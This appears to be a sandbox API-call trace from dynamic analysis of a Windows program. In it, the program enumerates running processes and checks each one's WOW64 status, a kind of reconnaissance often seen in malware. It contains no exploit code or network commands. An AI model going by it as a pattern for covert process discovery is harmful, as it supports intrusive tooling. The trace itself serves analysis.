	[0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e860, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.516] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.516] CloseHandle (hObject=0x224) returned 1
	[0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c28) returned 0xc0000004
	[0075.557] VirtualAlloc (lpAddress=0x0, dwSize=0x16d28, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d28, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.562] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.562] CloseHandle (hObject=0x224) returned 1
	[0075.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.563] CloseHandle (hObject=0x224) returned 1
	[0075.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.563] CloseHandle (hObject=0x224) returned 1
	[0075.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.563] CloseHandle (hObject=0x224) returned 1
	[0075.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.563] CloseHandle (hObject=0x224) returned 1
	[0075.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.564] CloseHandle (hObject=0x224) returned 1
	[0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.564] CloseHandle (hObject=0x224) returned 1
	[0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.564] CloseHandle (hObject=0x224) returned 1
	[0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.564] CloseHandle (hObject=0x224) returned 1
	[0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.565] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.565] CloseHandle (hObject=0x224) returned 1
	[0075.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.565] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.565] CloseHandle (hObject=0x224) returned 1
	[0075.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.565] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.565] CloseHandle (hObject=0x224) returned 1
	[0075.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.565] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.565] CloseHandle (hObject=0x224) returned 1
	[0075.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.566] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.566] CloseHandle (hObject=0x224) returned 1
	[0075.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.566] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.566] CloseHandle (hObject=0x224) returned 1
	[0075.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.566] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.566] CloseHandle (hObject=0x224) returned 1
	[0075.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.566] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.566] CloseHandle (hObject=0x224) returned 1
	[0075.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.566] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.566] CloseHandle (hObject=0x224) returned 1
	[0075.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.567] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.567] CloseHandle (hObject=0x224) returned 1
	[0075.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728998, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.567] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.567] CloseHandle (hObject=0x224) returned 1
	[0075.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.567] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.567] CloseHandle (hObject=0x224) returned 1
	[0075.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.567] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.567] CloseHandle (hObject=0x224) returned 1
	[0075.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.568] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.568] CloseHandle (hObject=0x224) returned 1
	[0075.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb30, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.568] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.568] CloseHandle (hObject=0x224) returned 1
	[0075.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.568] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.568] CloseHandle (hObject=0x224) returned 1
	[0075.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.568] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.568] CloseHandle (hObject=0x224) returned 1
	[0075.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.568] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.568] CloseHandle (hObject=0x224) returned 1
	[0075.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.569] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.569] CloseHandle (hObject=0x224) returned 1
	[0075.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.569] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.569] CloseHandle (hObject=0x224) returned 1
